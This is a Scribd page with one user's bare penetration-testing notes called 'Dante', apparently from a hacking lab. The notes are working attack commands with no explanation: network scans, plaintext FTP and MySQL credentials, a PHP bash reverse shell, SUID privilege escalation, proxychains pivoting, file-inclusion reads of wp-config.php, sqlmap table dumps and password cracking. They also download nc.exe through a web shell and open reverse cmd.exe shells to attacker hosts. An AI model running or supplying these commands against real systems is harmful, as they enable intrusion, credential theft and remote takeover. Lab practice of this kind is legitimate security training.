Scribd
Upload
197 views2 pages

Dante

The document contains a series of commands and scripts used for network scanning, exploitation, and privilege escalation on various IP addresses. It includes methods for accessing services like FTP and MySQL, executing shell commands, and utilizing tools like Nmap and SQLMap for penetration testing. Additionally, there are references to file manipulation and remote code execution techniques in a Windows environment.

Uploaded by

anant
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
197 views2 pages

Dante

The document contains a series of commands and scripts used for network scanning, exploitation, and privilege escalation on various IP addresses. It includes methods for accessing services like FTP and MySQL, executing shell commands, and utilizing tools like Nmap and SQLMap for penetration testing. Additionally, there are references to file manipulation and remote code execution techniques in a Windows environment.

Uploaded by

anant
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
You are on page 1/ 2

nmap -sVC -p- 10.10.100.

0/24 --min-rate=1000

ftp 10.10.110.100

james / Toyota

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.6/1234 0>&1'"); ?>

python3 -c 'import pty; pty.spawn("/bin/bash")'

cat .bash_history

mysql -u balthazar -p TheJoker12345!

find / -type f -perm -4000 2>/dev/null

python3 -c 'import pty; pty.spawn("/bin/bash")'

find . -exec /bin/sh \; -quit

ssh -i id_rsa -D 1080 [email protected] socks5 127.0.0.1 1080 in


/etc/proxychains.conf

for i in {1..255} ;do (ping -c 1 172.16.1.$i | grep "bytes from"|cut -d ' ' -f4|tr
-d ':' &);done

172.16.1.5
172.16.1.10
172.16.1.13
172.16.1.17
172.16.1.20
172.16.1.19
172.16.1.100
172.16.1.101
172.16.1.102

proxychains nmap 172.16.1.10 -sT -sV -Pn -T5

proxychains smbclient -L \\172.16.1.10

72.16.1.10/nav.php?page=../../../../etc/passwd

proxychains curl
"172.16.1.10/nav.php?page=php://filter/convert.base64-encode/resource=/var/www/
html/wordpress/wp-config.php" | base64 -d > wp-config.php

:set shell=/bin/bash
:shell get out of controlled vim environment

TractorHeadtorchDeskmat

import os
os.system("cp /bin/sh /tmp/sh;chmod u+s /tmp/sh")
/tmp/sh -p

admin Password6543
http://172.16.1.13/discuss/ups/shell.php?cmd=powershell wget
http://10.10.14.2/nc.exe -o nc.exe

http://172.16.1.13/discuss/ups/shell.php?cmd=nc.exe -e cmd.exe 10.10.14.2 1234

.\druva.py "windows\system32\cmd.exe /C C:\xampp\htdocs\discuss\ups\nc.exe


10.10.14.13 4444 -e cmd.exe"

powershell wget 10.10.14.2/nc.exe -o C:\xampp\htdocs\discuss\ups\nc.exec:\python27\


python.exe druva.py "windows\system32\cmd.exe /C C:\xampp\htdocs\discuss\ups\nc.exe
10.10.14.2 4444 -e cmd.exe"

dirsearch -u http://172.16.1.12 --proxy socks5://127.0.0.1:1080 -w


/usr/share/dirb/wordlists/common.txt

proxychains sqlmap -u http://172.16.1.12/blog/category.php?id=2 --dbs --batch

proxychains sqlmap -u http://172.16.1.12/blog/category.php?id=2 -D blog_admin_db --


tables

proxychains sqlmap -u http://172.16.1.12/blog/category.php?id=2 -D blog_admin_db -T


membership_users --dump

john hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt --format=Raw-MD5

upload /home/kali/Desktop/Dante/nc.exe/nc.exe C:\\Users\\Katwamba\\Desktop\\nc.exe

execute -f "C:\\Users\\Katwamba\\Desktop\\nc.exe" -a "10.10.14.13 4444 -e cmd.exe"

You might also like